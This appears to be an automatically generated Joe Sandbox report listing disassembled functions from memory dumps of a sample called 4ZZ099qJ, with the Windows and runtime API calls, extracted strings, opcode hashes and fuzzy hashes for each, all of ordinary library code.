CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00EDAC06

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: 2aeab5432404e720d7801fa70fc04fdbecd8c06bf450efc61693288367d1793a
Instruction ID: d2075d61f2078a04432175f5132ed7f788a6fe465062ef8250fd307614d0a2b2
Opcode Fuzzy Hash: 2aeab5432404e720d7801fa70fc04fdbecd8c06bf450efc61693288367d1793a
Instruction Fuzzy Hash: 7071C57291014A9FDF209F64C941AEFBBB6EF45758F2C613BE805B6350D7358A02C762

Uniqueness

Uniqueness Score: -1.00%

Function 0104D7B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 458COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 0104D89C
__aulldiv.LIBCMT ref: 0104DB8C
__aulldiv.LIBCMT ref: 0104DCCC

Strings

2, xrefs: 0104DB3C
2, xrefs: 0104DC7C

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: __aulldiv$Mtx_unlock
String ID: 2$2
API String ID: 3970587470-3919836843
Opcode ID: 96b74256e0644834cb0257f56434928c3e2489f642f5da69b288e5a9dbeb893a
Instruction ID: d4f4b0a427bcc4174fc718fc1af4c999450a880d30fdf99e33227c5885803abd
Opcode Fuzzy Hash: 96b74256e0644834cb0257f56434928c3e2489f642f5da69b288e5a9dbeb893a
Instruction Fuzzy Hash: 8A128AB0E00258CFEF15CFE8C8947EEBBB1BB59304F208299D4557B282D7B55985CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E830E9 Relevance: 9.2, APIs: 6, Instructions: 176COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00EB9848
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 00EB98B3
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EB98D0
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EB990F
LCMapStringEx.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00EB996E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00EB9991

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: e2bb4c67ebd54c3bb840c903fd491ab6af76a525a8f1e214daa772ac43050494
Instruction ID: 9e92858d8df8ac46fcda496e17bc57127946bf401bf89d8ea3e52a824465d409
Opcode Fuzzy Hash: e2bb4c67ebd54c3bb840c903fd491ab6af76a525a8f1e214daa772ac43050494
Instruction Fuzzy Hash: 0F51DF72500216ABEB205FA4CC45FEB7BB9EF85784F245029FA18FA152D7358D10DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0111169E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

X/Q, xrefs: 0111176D

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID: X/Q
API String ID: 0-2476670741
Opcode ID: 6a8c69217a1d4ff4ea994e62025230e3cff6acc2fc15b528173c99aff8f63665
Instruction ID: ac0dec882e5e5d9ff7af3786e8dbde949904c6cb5f10828dedd32b2dcba864bb
Opcode Fuzzy Hash: 6a8c69217a1d4ff4ea994e62025230e3cff6acc2fc15b528173c99aff8f63665
Instruction Fuzzy Hash: 3141E4B1A00B55BFE72D9F78C841BAAFBE9EB84714F10453AE601DB3C0D7B1A5418780

Uniqueness

Uniqueness Score: -1.00%

Function 00EFD178 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,57FC35AD,?,?,00000000,00F57A82,000000FF,?,00EFD0DB,?,?,00EFD08A,?), ref: 00EFD1AD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EFD1BF
FreeLibrary.KERNEL32(00000000,?,?,00000000,00F57A82,000000FF,?,00EFD0DB,?,?,00EFD08A,?), ref: 00EFD1E1

Strings

mscoree.dll, xrefs: 00EFD1A6
CorExitProcess, xrefs: 00EFD1B7

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b4a5157579d74b37558426cd7131e5930d06b0c19c1010e87e8e40e5593184f5
Instruction ID: 0663ae940cf90d6080f87b866d3f06d29f1625a20347569dbbed39c2842ff07d
Opcode Fuzzy Hash: b4a5157579d74b37558426cd7131e5930d06b0c19c1010e87e8e40e5593184f5
Instruction Fuzzy Hash: 6801D631954619EFDB219F90DC05FBEBBB8FB04B15F100229FC51A22C0DB79A900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0112516D Relevance: 7.7, APIs: 5, Instructions: 248COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 011253A8
__freea.LIBCMT ref: 011253AE
__freea.LIBCMT ref: 011253E4
__freea.LIBCMT ref: 011253EA
__freea.LIBCMT ref: 011253FA

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: __freea
String ID:
API String ID: 240046367-0
Opcode ID: 687154838c0f90aaa2414f9ed465cba8917d341f1d6eeeeb4a4397ef7ee3db92
Instruction ID: 38b4129090a98d803fe14df4c7484ef96ed54f80d8d3c2731ef1160d90cacd74
Opcode Fuzzy Hash: 687154838c0f90aaa2414f9ed465cba8917d341f1d6eeeeb4a4397ef7ee3db92
Instruction Fuzzy Hash: 48713A32A042269FDF6C9E988CC0BEEBBBB9F56314F290015E955A7280E771D8108791

Uniqueness

Uniqueness Score: -1.00%

Function 010E8F70 Relevance: 7.7, Strings: 6, Instructions: 226COMMON

Download Yara Rule

Strings

<ZR, xrefs: 010E910F
HPR, xrefs: 010E90F5
DZR, xrefs: 010E9149
HPR, xrefs: 010E90CC
TZR, xrefs: 010E91DC
HPR, xrefs: 010E90DB

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID: <ZR$DZR$HPR$HPR$HPR$TZR
API String ID: 0-3920924093
Opcode ID: f8f7f8027bb80f1ed65cf7d9b6d07957a9dcf7913e0d988ccdb0e4df845e3e6c
Instruction ID: 41a6cdda5292e22e535d9702ce94408aa9d764f6de8900f529b6eae09d619615
Opcode Fuzzy Hash: f8f7f8027bb80f1ed65cf7d9b6d07957a9dcf7913e0d988ccdb0e4df845e3e6c
Instruction Fuzzy Hash: 32817D70B00B015FEB25EB2ADC55BAB7BD6AF60704F00841DE5CA5B3D1EBB5A940C785

Uniqueness

Uniqueness Score: -1.00%

Function 010D84A0 Relevance: 7.5, Strings: 6, Instructions: 49COMMON

Download Yara Rule

Strings

@JR, xrefs: 010D84E9
8JR, xrefs: 010D84B1
Q, xrefs: 010D84AC
8JR, xrefs: 010D84D0
8JR, xrefs: 010D8514
@JR, xrefs: 010D8505

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID: 8JR$8JR$8JR$@JR$@JR$Q
API String ID: 0-1818198465
Opcode ID: 489c37c6dac4dfd7001d2d776827244599785d81103743e32a6d655a503d5d46
Instruction ID: ac33be14ff728e567bd19680dbf077f17c4e11f69221d734b1750014d4229a96
Opcode Fuzzy Hash: 489c37c6dac4dfd7001d2d776827244599785d81103743e32a6d655a503d5d46
Instruction Fuzzy Hash: 15F0FF62BC022137E72421552C1BBAB58CBDBF2B56F12403EB9086B6D2F9A08C120798

Uniqueness

Uniqueness Score: -1.00%

Function 0104E420 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 421COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0104E74C
__aulldiv.LIBCMT ref: 0104E88B

Strings

2, xrefs: 0104E6FC
2, xrefs: 0104E83B

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: 2$2
API String ID: 3732870572-3919836843
Opcode ID: b8ff9b906e60def299714a584ea019f9a8d7f568f8597468b6993b4a540b8f53
Instruction ID: 588a7fdbed60e1bbb2abe2dfa61c132e1fd880aab6994e21f85c6288155b0d35
Opcode Fuzzy Hash: b8ff9b906e60def299714a584ea019f9a8d7f568f8597468b6993b4a540b8f53
Instruction Fuzzy Hash: CD128AB0E00259CFEF15CFA8C8A07EDBBB1BB59314F208299D4517B282D7791985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0104DE30 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 421COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0104E15C
__aulldiv.LIBCMT ref: 0104E29B

Strings

2, xrefs: 0104E10C
2, xrefs: 0104E24B

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: 2$2
API String ID: 3732870572-3919836843
Opcode ID: 0305eb8e8556d2a3604ae8353d30c220af65604152aeb041cc6afb2fdbe741e7
Instruction ID: b5ef28ddf9acd08a69bda0ed267b61a008234e87ffe21376263a9bf10caf3d27
Opcode Fuzzy Hash: 0305eb8e8556d2a3604ae8353d30c220af65604152aeb041cc6afb2fdbe741e7
Instruction Fuzzy Hash: D7127AB0E00259CFEF15CFA8C8A47EEBBB1BB59314F208299D4517B282D7751985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01110CB9 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

__dosmaperr.LIBCMT ref: 01110DD4
__dosmaperr.LIBCMT ref: 01110DF3
__dosmaperr.LIBCMT ref: 01110F99

Strings

H, xrefs: 01110F1E

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: __dosmaperr
String ID: H
API String ID: 2332233096-2852464175
Opcode ID: d0150422c8f04e08219c448ad9e0d7c2e0298d1bf9993a076c718878905dc4b5
Instruction ID: 0671456964796bc64f17a67569c6340bb00d670a35fb35637dbf226573dd1500
Opcode Fuzzy Hash: d0150422c8f04e08219c448ad9e0d7c2e0298d1bf9993a076c718878905dc4b5
Instruction Fuzzy Hash: 25A13632E0411A9FDF1D9F68DC51BAEBBA1AB0A324F14016DF8119F3D5CB319856CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EE12A4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00EE12C9
CatchIt.LIBVCRUNTIME ref: 00EE13AF

Strings

RCC, xrefs: 00EE12E3
MOC, xrefs: 00EE12DB

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 3aa81242dfd87ac63921fc65297dce5fff56dd87a13420208ebe7af8ec4c0e7d
Instruction ID: d319151f5df55e592ad6ed17f095c2f1efb0bc2bd82d69db90887fa94b136885
Opcode Fuzzy Hash: 3aa81242dfd87ac63921fc65297dce5fff56dd87a13420208ebe7af8ec4c0e7d
Instruction Fuzzy Hash: BD416871A0024DAFCF15DF95CD81AEEBBB6FF08304F199199F908B6611E3759990CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0109E320 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0109F1DA
___std_exception_destroy.LIBVCRUNTIME ref: 0109F1F4

Strings

DeP, xrefs: 0109F1EA
DeP, xrefs: 0109F1D0

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: DeP$DeP
API String ID: 4194217158-1713376341
Opcode ID: ca818db3b692770dcdc53605d53a8ee6311c0d2ad288667b08c8789b8bbf076f
Instruction ID: cac57338c81b791fc1c104daee74ed6071e94b4e27de67bcfddcd400573e28d7
Opcode Fuzzy Hash: ca818db3b692770dcdc53605d53a8ee6311c0d2ad288667b08c8789b8bbf076f
Instruction Fuzzy Hash: 26416BB0C0538CDEDB11CFA4C9587CEBFB8AF25304F144199D588A7280DBB85B88CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EEAF02 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00EEADAA,?,?,?,?,?,?,00EEB054,00000003,FlsSetValue,0100C3B8,0100C3C0), ref: 00EEAF0F
GetLastError.KERNEL32(?,00EEADAA,?,?,?,?,?,?,00EEB054,00000003,FlsSetValue,0100C3B8,0100C3C0), ref: 00EEAF19
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00EEAF41

Strings

api-ms-, xrefs: 00EEAF26

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: f58eba44f22c41941c1194ad960e0bed811cdf538771c7b36c7ab063eca5372c
Instruction ID: 3728f95e590d7b18d3a2b956723a356ee8477c602d341a050c2ebdb69f6a092c
Opcode Fuzzy Hash: f58eba44f22c41941c1194ad960e0bed811cdf538771c7b36c7ab063eca5372c
Instruction Fuzzy Hash: BDE04F71384249F7EB301F62EC46B183B65BB00B89F785078FA4CF80D1EB66E910CA85

Uniqueness

Uniqueness Score: -1.00%

Function 01038820 Relevance: 6.7, Strings: 5, Instructions: 496COMMON

Download Yara Rule

Strings

/, xrefs: 01038CC4
*, xrefs: 01038EB7
\, xrefs: 01038C8B
LmP, xrefs: 01038DAB
L/R, xrefs: 01038E25

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID: *$/$L/R$LmP$\
API String ID: 0-1441866853
Opcode ID: 3bf69eb6693a89699aafa72b6ecdcfbe3976da316bf1f2783362906443e6022d
Instruction ID: 12b5ada306cb36841bf37fdff3cf0753d53ea2d52fa93e5ed3b6b8bd5caf8067
Opcode Fuzzy Hash: 3bf69eb6693a89699aafa72b6ecdcfbe3976da316bf1f2783362906443e6022d
Instruction Fuzzy Hash: 76327770C0129ADFDF01DFA8C954BEDBBB4AF65308F1482D9D4496B291DBB05B88CB91

Uniqueness

Uniqueness Score: -1.00%

Function 010B9BC0 Relevance: 6.4, Strings: 5, Instructions: 102COMMON

Download Yara Rule

Strings

9, xrefs: 010B9C31
0, xrefs: 010B9C2C
+, xrefs: 010B9C07
0, xrefs: 010B9C13
-, xrefs: 010B9BF2

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID: +$-$0$0$9
API String ID: 0-2905700305
Opcode ID: 596986b5f6e47dedd99f5da14ce26cbec1e4a4aa3da5793607798e145e836715
Instruction ID: e1dea1710f5d13fbb757cb1f84912527efa747bb1bd6670f7ba05848ee9a1de4
Opcode Fuzzy Hash: 596986b5f6e47dedd99f5da14ce26cbec1e4a4aa3da5793607798e145e836715
Instruction Fuzzy Hash: F131C9B1E0526D4EEB118A6DC4C03EDFBE49B8631CF6941EAD988D7242D67649818780

Uniqueness

Uniqueness Score: -1.00%

Function 00F3DFF0 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(57FC35AD,?,00000000,?), ref: 00F3E053
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F3E2AE
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F3E2F6
GetLastError.KERNEL32 ref: 00F3E399

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: bc9b9f19a8c3089e08ca63049fbe2af74454fd9d54aad17621af65cb050a0dce
Instruction ID: 733e6da12fa73fef5533136a6ae5132069f2a7693c0b7cb45430a382b2b4cc7d
Opcode Fuzzy Hash: bc9b9f19a8c3089e08ca63049fbe2af74454fd9d54aad17621af65cb050a0dce
Instruction Fuzzy Hash: 72D159B5E002589FCF15DFA8D880AEDBBB5FF49324F28412AE855E7381D730A941DB50

Uniqueness

Uniqueness Score: -1.00%

Function 011051AF Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 01105276
___AdjustPointer.LIBCMT ref: 01105299
___AdjustPointer.LIBCMT ref: 01105335

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
